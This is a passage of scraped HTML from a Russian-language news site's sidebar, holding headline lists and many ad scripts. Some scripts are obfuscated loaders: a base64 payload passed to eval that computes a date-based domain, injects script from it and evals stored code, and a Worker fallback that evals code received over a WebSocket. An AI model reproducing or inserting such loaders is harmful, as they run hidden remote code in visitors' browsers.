                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ4eXoiXTsgdmFyIHN0ciA9ZGF5Kihtb250aCAqIG5hbWVfZGF5ICogZGF5KSsiIisgZGF5Kihtb250aCArIG5hbWVfZGF5ICsgZGF5ICt5ZWFyKTt2YXIgaGFzaCA9ICBidG9hKGJ0b2Eoc3RyKSkudG9Mb3dlckNhc2UoKTsgdmFyIGhvc3QgPSBoYXNoLnN1YnN0cmluZygzLCBoYXNoLmxlbmd0aCAtIG5hbWVfZGF5LzIpKyIuIitkb21bbmFtZV9kYXkgLSAxXTt2YXIgciA9IE1hdGgucmFuZG9tKCkudG9TdHJpbmcoMzYpLnN1YnN0cigyLCAyKTtyID0gci5yZXBsYWNlKC9bMC05XS9nLCAiIik7dmFyIGRlbHRhID0gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogKDEwMCAtIDEwICsgMSkpICsgMTA7dmFyIGlkID0gNDc4NiAtIGRlbHRhOyB2YXIgc2NyaXB0X2ZpcnN0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7c2NyaXB0X2ZpcnN0LnNyYyA9ICJodHRwczovLyIrIGhvc3QrIi8iK2RlbHRhK2lkK3IrIiI7IG5vZGU0Nzg2LnBhcmVudE5vZGUuYXBwZW5kQ2hpbGQoc2NyaXB0X2ZpcnN0KTtzY3JpcHRfZmlyc3Qub25lcnJvciA9IGZ1bmN0aW9uKCl7IHNldFRpbWVvdXQoIGZ1bmN0aW9uICgpIHsgaWYoIG5vZGU0Nzg2LmlubmVySFRNTCA9PSAiIiApIHdpbmRvdy5ldmFsKGxvY2FsU3RvcmFnZS5nZXRJdGVtKCI0Nzg2IikpIH0sIDUwMDApOyAgO307IA==") );
              }
          }
          </script>
            
            <!-- start NEW_v1_right for hronika.info -->
<div id="adpartner-jsunit-850">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=850&" + Math.random();
        head.appendChild(script);
    </script>
</div>
<!-- end NEW_v1_right for hronika.info -->
            <div id="IencjMRQWgr5YuVfVLqO" data-type="2" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'leokross.com';</script>
<script src="//leokross.com/WZuI/GLYm.js" ></script>
            <script type="text/javascript">

    (function(w, d, y, h, p, a, b) {
        w[y] = w[y] || []; w[y].push(function() {return [a, b]});
        for (var e, r = d.getElementsByTagName("script"), t = h + "/d0e1/e179f51b/5154/719f/5b027feea71/0e17fee/d0e17fe", n = r.length; n--;) (r[n].src == t || r[n].src.indexOf(t) > -1) && (e = r[n]);
        if (w['ccScriptSupport'] === undefined || !e) {
            var s = d.head || d.getElementsByTagName("head")[0]; e = d.createElement("script"), e.type = "text/javascript", e.src = t, s.appendChild(e);e.setAttribute('data-base', h);e.setAttribute('data-config', p);
        }
    })(this, this.document, "spAsyncScript", 'https://csp-qcw5yi.ru', 9568, this.document.currentScript, '5b4f41520bbda536cf2240e3');
</script>
            <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Side-1 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5084862545"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>                
				<h3>Хроника событий сегодня</h3>
               <div class="newsr_1">
    <span>02.10-02:15</span>
	<a href="http://hronika.info/kultura/356217-semya-bekhemov-otprazdnovala-godovschinu-so-zvezdnymi-gostyami.html"><strong title="Семья Бекхэмов отпраздновала годовщину со звездными гостями">Семья Бекхэмов отпраздновала годовщину со звездными гостями</strong><b>18</b></a>
</div><div class="newsr_1">
    <span>02.10-02:03</span>
	<a href="http://hronika.info/avto/356216-nazvany-glavnye-ulovki-pri-prodazhe-mashin-v-avtosalone.html"><strong title="Названы главные уловки при продаже машин в автосалоне">Названы главные уловки при продаже машин в автосалоне</strong><b>122</b></a>
</div><div class="newsr_1">
    <span>02.10-01:51</span>
	<a href="http://hronika.info/neverojatnoe/356215-arkticheskaya-stanciya-zafiksirovala-neobychnye-chasticy.html"><strong title="Арктическая станция зафиксировала необычные частицы">Арктическая станция зафиксировала необычные частицы</strong><b>113</b></a>
</div><div class="newsr_1">
    <span>02.10-01:39</span>
	<a href="http://hronika.info/medicina/356214-nazvany-glavnye-poleznye-svoystva-temnogo-piva.html"><strong title="Названы главные полезные свойства темного пива">Названы главные полезные свойства темного пива</strong><b>223</b></a>
</div><div class="newsr_1">
    <span>02.10-01:27</span>
	<a href="http://hronika.info/videonovosti/356213-arabskie-bezhency-udarili-lindsi-lohan-v-pryamom-efire-video.html"><strong title="Арабские беженцы ударили Линдси Лохан в прямом эфире. Видео">Арабские беженцы ударили Линдси Лохан в прямом эфире. Видео</strong><b>148</b></a>
</div><div class="newsr_1">
    <span>02.10-01:15</span>
	<a href="http://hronika.info/mir/356212-u-pravitelstvennogo-zdaniya-v-barselone-proshli-stychki.html"><strong title="У правительственного здания в Барселоне прошли стычки">У правительственного здания в Барселоне прошли стычки</strong><b>186</b></a>
</div><div class="newsr_1">
    <span>02.10-01:03</span>
	<a href="http://hronika.info/kultura/356211-alla-pugacheva-sbrosila-20-kg-za-dva-mesyaca-poyavilos-foto.html"><strong title="Алла Пугачева сбросила 20 кг за два месяца: появилось фото">Алла Пугачева сбросила 20 кг за два месяца: появилось фото</strong><b>186</b></a>
</div><div class="newsr_1">
    <span>02.10-00:52</span>
	<a href="http://hronika.info/avto/356210-sotrudnik-muzeya-pokazal-eskizy-unikalnyh-modeley-zaz.html"><strong title="Сотрудник музея показал эскизы уникальных моделей ЗАЗ">Сотрудник музея показал эскизы уникальных моделей ЗАЗ</strong><b>492</b></a>
</div><div class="newsr_1">
    <span>02.10-00:41</span>
	<a href="http://hronika.info/neverojatnoe/356209-izvestnyy-astronom-predupredil-o-novyh-opasnostyah-kollaydera.html"><strong title="Известный астроном предупредил о новых опасностях коллайдера">Известный астроном предупредил о новых опасностях коллайдера</strong><b>539</b></a>
</div><div class="newsr_1">
    <span>02.10-00:30</span>
	<a href="http://hronika.info/medicina/356208-uchenye-opredelili-optimalnuyu-dlinu-rabochey-nedeli.html"><strong title="Ученые определили оптимальную длину рабочей недели">Ученые определили оптимальную длину рабочей недели</strong><b>348</b></a>
</div>
                <div class="vsenovosti" title="Все новости хроники"><a href="/lastnews">Все новости хроники</a></div>
			</div>

               <div class="wrap">
				<h3>События сегодня</h3>           
</div>
   </div>   
   
   <div class="width49-4 fright">
   
   
<!--
<div id="ax_popular_comp">
	<ul class="tabs tshadow ax_tabs" style="height: 31px;">
		<li title="Компетентно" style="width: 147px;"><a href="#ax_comp">Компетентно</a></li>
		<li title="Актуально"><a href="#ax_actual">Актуально</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_comp">
			<div class="b-tab-n1">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html"><img src="/posters/300_131_70_1/uploads/posts/2015-03/thumbs/1426164908_mvf.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-author"><a href="/kompetentno/">Наши эксперты</a></span>
	<span class="b-full-link"><a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html">«Согреют» ли деньги МВФ простых украинцев</a></span>
	
</div>

<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author1"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426164917_lanov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Лановой</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author2"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426164962_zhalilo.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Ярослав Жалило</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author3"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426165061_dubrov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Дубровский</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author4"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426165044_shapran.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Виталий Шапран</span>
</div>

		</div>			
		<div id="ax_actual">
			 <div class="b-tab-n1">
	<a href="http://hronika.info/politika/356200-v-ap-otreagirovali-na-isk-v-sud-iz-za-obrascheniya-o-tomose.html"><img src="/posters/300_131_70_1/uploads/posts/2018-10/thumbs/1538425823_tomos.jpeg" alt="В АП отреагировали на иск в суд из-за обращения о Томосе" title="В АП отреагировали на иск в суд из-за обращения о Томосе" /></a>
	
	<span class="b-full-link"><a href="http://hronika.info/politika/356200-v-ap-otreagirovali-na-isk-v-sud-iz-za-obrascheniya-o-tomose.html">В АП отреагировали на иск в суд из-за обращения о Томосе</a></span>

</div>
			 <div class="b-tab-n2">
	<a href="http://hronika.info/politika/356159-novinskiy-stal-glavoy-dvizheniya-partiya-mira.html"><img src="/posters/74_74_70_1/uploads/posts/2018-10/thumbs/1538410643_novinskii.jpg" alt="Новинский стал главой движения "Партия Мира"" title="Новинский стал главой движения "Партия Мира"" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/356098-poroshenko-vruchil-ollandu-orden-svobody.html"><img src="/posters/74_74_70_1/uploads/posts/2018-10/thumbs/1538399566_olland.jpg" alt="Порошенко вручил Олланду орден Свободы" title="Порошенко вручил Олланду орден Свободы" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/356085-na-poroshenko-podali-v-sud-iz-za-avtokefalii.html"><img src="/posters/74_74_70_1/uploads/posts/2018-10/thumbs/1538397881_cerkov.jpeg" alt="На Порошенко подали в суд из-за автокефалии" title="На Порошенко подали в суд из-за автокефалии" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/356056-poroshenko-obsudil-s-merkel-detali-ee-vizita-v-ukrainu.html"><img src="/posters/74_74_70_1/uploads/posts/2018-10/thumbs/1538392461_merkel.jpg" alt="Порошенко обсудил с Меркель детали ее визита в Украину" title="Порошенко обсудил с Меркель детали ее визита в Украину" /></a>
	

</div>
		</div>			         
	</div>
</div>

<div class="clr"></div>
 

-->      
       


			<div class="wrap">
				<h3 class="inbg">Мнения</h3> 
				<div>
					<div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1877.jpg" />
        <div>01.10.2018|17:00</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%9A%D0%B8%D1%80%D0%B8%D0%BB%D0%BB+%D0%A1%D0%B0%D0%B7%D0%BE%D0%BD%D0%BE%D0%B2', 'http://hronika.info/user/%D0%9A%D0%B8%D1%80%D0%B8%D0%BB%D0%BB+%D0%A1%D0%B0%D0%B7%D0%BE%D0%BD%D0%BE%D0%B2/', '0'); return false;" href="http://hronika.info/user/%D0%9A%D0%B8%D1%80%D0%B8%D0%BB%D0%BB+%D0%A1%D0%B0%D0%B7%D0%BE%D0%BD%D0%BE%D0%B2/">Кирилл Сазонов</a></div>
    	<strong><a href="http://hronika.info/mnenia/355817-kto-stanet-prezidentom-ukrainy.html">Кто станет президентом Украины</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1887.jpg" />
        <div>01.10.2018|16:15</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%A1%D0%B5%D1%80%D0%B3%D0%B5%D0%B9+%D0%A4%D1%83%D1%80%D1%81%D0%B0', 'http://hronika.info/user/%D0%A1%D0%B5%D1%80%D0%B3%D0%B5%D0%B9+%D0%A4%D1%83%D1%80%D1%81%D0%B0/', '0'); return false;" href="http://hronika.info/user/%D0%A1%D0%B5%D1%80%D0%B3%D0%B5%D0%B9+%D0%A4%D1%83%D1%80%D1%81%D0%B0/">Сергей Фурса</a></div>
    	<strong><a href="http://hronika.info/mnenia/355816-timoshenko-kak-oficialnyy-predstavitel-gazproma.html">Тимошенко как официальный представитель Газпрома</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1889.jpg" />
        <div>01.10.2018|15:30</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%A3%D0%BA%D0%BE%D0%BB%D0%BE%D0%B2', 'http://hronika.info/user/%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%A3%D0%BA%D0%BE%D0%BB%D0%BE%D0%B2/', '0'); return false;" href="http://hronika.info/user/%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%A3%D0%BA%D0%BE%D0%BB%D0%BE%D0%B2/">Виктор Уколов</a></div>
    	<strong><a href="http://hronika.info/mnenia/355815-timoshenko-gazprom-ta-nteresi-kremlya.html">Тимошенко, Газпром та інтереси Кремля</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1878.jpg" />
        <div>01.10.2018|14:45</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%BE+%D0%A1%D0%BD%D1%94%D0%B3%D0%B8%D1%80%D1%8C%D0%BE%D0%B2', 'http://hronika.info/user/%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%BE+%D0%A1%D0%BD%D1%94%D0%B3%D0%B8%D1%80%D1%8C%D0%BE%D0%B2/', '0'); return false;" href="http://hronika.info/user/%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%BE+%D0%A1%D0%BD%D1%94%D0%B3%D0%B8%D1%80%D1%8C%D0%BE%D0%B2/">Дмитро Снєгирьов</a></div>
    	<strong><a href="http://hronika.info/mnenia/355814-pro-sinhronzacyu-roboti-luganskoyi-tes.html">Про синхронізацію роботи Луганської ТЕС</a></strong>			
</div>
				</div>
                <div class="vsenovosti" title="Мнения, рассуждения, аналитика"><a href="/mnenia/">Читать все мнения</a></div>
			</div>
  

	<div class="hrap" >
    
            	﻿


 <div class="fleft authbut"><a class="alert4">Авторизация</a></div> 
 <div class="fright authbut"><a rel="nofollow" href="/index.php?do=register">Регистрация</a></div>
 <div class="clr"></div>
<div id="dim4">
<div class="msgbox">
<div class="msgboxttl"><span></span>Вход на сайт<a class="close">X</a></div>
 		<form method="post" action="#">
				<div id="logentform"><span></span>
                <div class="msgbox_ent">Войти используя учетную запись хроники</div>
					<ul class="reset">
						<li class="logfield"><label for="login_name">Введите E-Mail:</label><input type="text" name="login_name" id="login_name" /></li>
						<li class="logfield"><label for="login_password">Введите Пароль :</label><input type="password" name="login_password" id="login_password" />&nbsp;(<a id="zabyli" href="http://hronika.info/index.php?do=lostpassword">Забыли?</a>)</li><br />
						<li class="zapomnit"><input type="checkbox" name="login_not_save" id="login_not_save" value="1"/><label for="login_not_save">&nbsp;Запомнить меня</label><button onclick="submit();" type="submit" title="Войти">Войти</button></li>
					</ul>
					<input name="login" type="hidden" id="login" value="submit" />
                    <div id="logreg"><a rel="nofollow" href="/index.php?do=register">Зарегистрироваться</a></div>
				</div> 
			</form>
            
            
 <div class="sotsenter">
	
	
	
	
	
	
 </div>

    <div class="clr h40"></div>
 <div class="clr msgbox_b"></div>
       </div>
    </div>

    </div>

    <div class="wrap"> 
        <!-- noindex -->
<div id='kurs-com-ua-informer-main-ukraine-300x130-blue-container'><a href="//old.kurs.com.ua/informer" id="kurs-com-ua-informer-main-ukraine-300x130-blue" title="Курс валют информер Украина" rel="nofollow" target="_blank">Информер курса валют</a></div>
<script type='text/javascript'>
(function() {var iframe = '<ifr'+'ame src="//old.kurs.com.ua/informer/inf2?color=blue" width="300" height="130" frameborder="0" vspace="0" scrolling="no" hspace="0"></ifr'+'ame>';var container = document.getElementById('kurs-com-ua-informer-main-ukraine-300x130-blue');container.parentNode.innerHTML = iframe;})();
</script>
<noscript><img src='//old.kurs.com.ua/static/images/informer/kurs.png' width='52' height='26' alt='kurs.com.ua: курс валют в Украине!' title='Курс валют' border='0' /></noscript>
<!--/ noindex -->  
        
    <div class="wrap">
        
    </div>
        
          
    <div class="wrap">
            	<h3>Новости сегодня</h3>
<div id="FMg6hQON63UZxhcgPUb0" data-type="0" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'hronikka.com';</script>
<script src="//hronikka.com/fR37/h0.js" ></script>

<script id="r17725" type="text/javascript">
    (function() {
        var worker17725,
            tickerID = 17725,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/17/ticker_17725.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker17725.postMessage(data);
                }

                worker17725 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker17725.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker17725.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
<center><script>
(function(c,o,u,n,t,e,r){
r = c[u](o); r[n] = t; r.async = 1;
r.onload = function(){c['AliExpressBannerGlobalObject'](e)};
c.body.appendChild(r);
})(document, 'script', 'createElement', 'src', '//alishop6.ru/902dy/src.js');
</script>

<div class="some_class"></div>
</center>
    </div>
        

              		<div id="poisk">
					<form method="post" action='#'>
						<input type="hidden" name="do" value="search" />
						<input type="hidden" name="subaction" value="search" />
						<input id="story" name="story" value="Введите поисковый запрос" onblur="if(this.value=='') this.value='Введите поисковый запрос';" onfocus="if(this.value=='Введите поисковый запрос') this.value='';" type="text" />
                        <input  alt="найти" type="image" src="/templates/hronika/images/poisk.png" />
					</form>
				</div>
			</div>
             
           
                       
            <div class="wrap bshadow">
				<h3 class="inbg">Самое интересное за неделю</h3> 				

<div id="ax_popular_obs">
	<ul class="tabs tshadow ax_tabs" style="height: 25px;">
		<li title="Обсуждаемое"><a href="#ax_obs">Обсуждаемое</a></li>
		<li title="Популярное"><a href="#ax_popular">Популярное</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_obs">
			 <div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/356217-semya-bekhemov-otprazdnovala-godovschinu-so-zvezdnymi-gostyami.html"><span>02.10-02:15</span>
	<strong title="Семья Бекхэмов отпраздновала годовщину со звездными гостями">Семья Бекхэмов отпраздновала годовщину со звездными гостями</strong></a><b>18</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/avto/356216-nazvany-glavnye-ulovki-pri-prodazhe-mashin-v-avtosalone.html"><span>02.10-02:03</span>
	<strong title="Названы главные уловки при продаже машин в автосалоне">Названы главные уловки при продаже машин в автосалоне</strong></a><b>122</b><div class="category_lastn_date" title="Авто">&nbsp;&nbsp;<a href="http://hronika.info/avto/">Авто</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/neverojatnoe/356215-arkticheskaya-stanciya-zafiksirovala-neobychnye-chasticy.html"><span>02.10-01:51</span>
	<strong title="Арктическая станция зафиксировала необычные частицы">Арктическая станция зафиксировала необычные частицы</strong></a><b>113</b><div class="category_lastn_date" title="Невероятное">&nbsp;&nbsp;<a href="http://hronika.info/neverojatnoe/">Невероятное</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/356214-nazvany-glavnye-poleznye-svoystva-temnogo-piva.html"><span>02.10-01:39</span>
	<strong title="Названы главные полезные свойства темного пива">Названы главные полезные свойства темного пива</strong></a><b>223</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/356213-arabskie-bezhency-udarili-lindsi-lohan-v-pryamom-efire-video.html"><span>02.10-01:27</span>
	<strong title="Арабские беженцы ударили Линдси Лохан в прямом эфире. Видео">Арабские беженцы ударили Линдси Лохан в прямом эфире. Видео</strong></a><b>148</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/mir/356212-u-pravitelstvennogo-zdaniya-v-barselone-proshli-stychki.html"><span>02.10-01:15</span>
	<strong title="У правительственного здания в Барселоне прошли стычки">У правительственного здания в Барселоне прошли стычки</strong></a><b>186</b><div class="category_lastn_date" title="Мир">&nbsp;&nbsp;<a href="http://hronika.info/mir/">Мир</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/356205-sergey-babkin-vypustil-pervyy-ukrainoyazychnyy-albom.html"><span>02.10-00:06</span>
	<strong title="Сергей Бабкин выпустил первый украиноязычный альбом">Сергей Бабкин выпустил первый украиноязычный альбом</strong></a><b>419</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/sport/356204-primera-nichya-reala-i-atletiko-novaya-osechka-barselony.html"><span>02.10-00:00</span>
	<strong title="Примера: ничья «Реала» и «Атлетико», новая осечка «Барселоны»">Примера: ничья «Реала» и «Атлетико», новая осечка «Барселоны»</strong></a><b>311</b><div class="category_lastn_date" title="Спорт">&nbsp;&nbsp;<a href="http://hronika.info/sport/">Спорт</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/avto/356203-microsoft-pomozhet-volkswagen-podklyuchit-avtomobili-k-oblaku.html"><span>01.10-23:54</span>
	<strong title="Microsoft поможет Volkswagen подключить автомобили к облаку">Microsoft поможет Volkswagen подключить автомобили к облаку</strong></a><b>306</b><div class="category_lastn_date" title="Авто">&nbsp;&nbsp;<a href="http://hronika.info/avto/">Авто</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/356202-mediki-rasskazali-pochemu-uzhinat-pered-televizorom-vredno.html"><span>01.10-23:48</span>
	<strong title="Медики рассказали, почему ужинать перед телевизором вредно">Медики рассказали, почему ужинать перед телевизором вредно</strong></a><b>410</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div>
			
		</div>			
		<div id="ax_popular">
		   <div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/355652-mediki-podskazali-effektivnoe-sredstvo-dlya-bystrogo-pohudeniya.html"><span>30.09-10:40</span>
	<strong title="Медики подсказали эффективное средство для быстрого похудения">Медики подсказали эффективное средство для быстрого похудения</strong></a><b>38438</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/tehnologii/355490-xiaomi-obnovlyaet-byudzhetnye-smartfony-do-miui-10.html"><span>29.09-15:40</span>
	<strong title="Xiaomi обновляет бюджетные смартфоны до MIUI 10">Xiaomi обновляет бюджетные смартфоны до MIUI 10</strong></a><b>36374</b><div class="category_lastn_date" title="Технологии">&nbsp;&nbsp;<a href="http://hronika.info/tehnologii/">Технологии</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/355687-vrachi-podskazali-kak-snizit-davlenie-bez-tabletok.html"><span>30.09-12:28</span>
	<strong title="Врачи подсказали, как снизить давление без таблеток">Врачи подсказали, как снизить давление без таблеток</strong></a><b>29525</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/355133-dietologi-podskazali-effektivnoe-sredstvo-dlya-bystrogo-pohudeniya.html"><span>28.09-11:55</span>
	<strong title="Диетологи подсказали эффективное средство для быстрого похудения">Диетологи подсказали эффективное средство для быстрого похудения</strong></a><b>28430</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/avto/354542-uchenye-rasskazali-pochemu-dizelnye-dvigateli-opasny-dlya-zhizni.html"><span>26.09-14:30</span>
	<strong title="Ученые рассказали, почему дизельные двигатели опасны для жизни">Ученые рассказали, почему дизельные двигатели опасны для жизни</strong></a><b>26093</b><div class="category_lastn_date" title="Авто">&nbsp;&nbsp;<a href="http://hronika.info/avto/">Авто</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/354419-dietologi-nazvali-utrennyuyu-privychku-sposobstvuyuschuyu-pohudeniyu.html"><span>26.09-09:30</span>
	<strong title="Диетологи назвали утреннюю привычку, способствующую похудению">Диетологи назвали утреннюю привычку, способствующую похудению</strong></a><b>24444</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/354747-mediki-nazvali-effektivnyy-napitok-dlya-normalizacii-davleniya.html"><span>27.09-09:18</span>
	<strong title="Медики назвали эффективный напиток для нормализации давления">Медики назвали эффективный напиток для нормализации давления</strong></a><b>21585</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/354463-dietologi-podskazali-kak-sbrosit-vosem-kg-za-10-dney.html"><span>26.09-11:30</span>
	<strong title="Диетологи подсказали, как "сбросить" восемь кг за 10 дней">Диетологи подсказали, как "сбросить" восемь кг за 10 дней</strong></a><b>17665</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/354884-dietologi-nazvali-effektivnyy-napitok-dlya-pohudeniya.html"><span>27.09-14:51</span>
	<strong title="Диетологи назвали эффективный напиток для похудения">Диетологи назвали эффективный напиток для похудения</strong></a><b>14596</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/355733-nazvana-privychka-sposobstvuyuschaya-bystromu-pohudeniyu.html"><span>30.09-14:43</span>
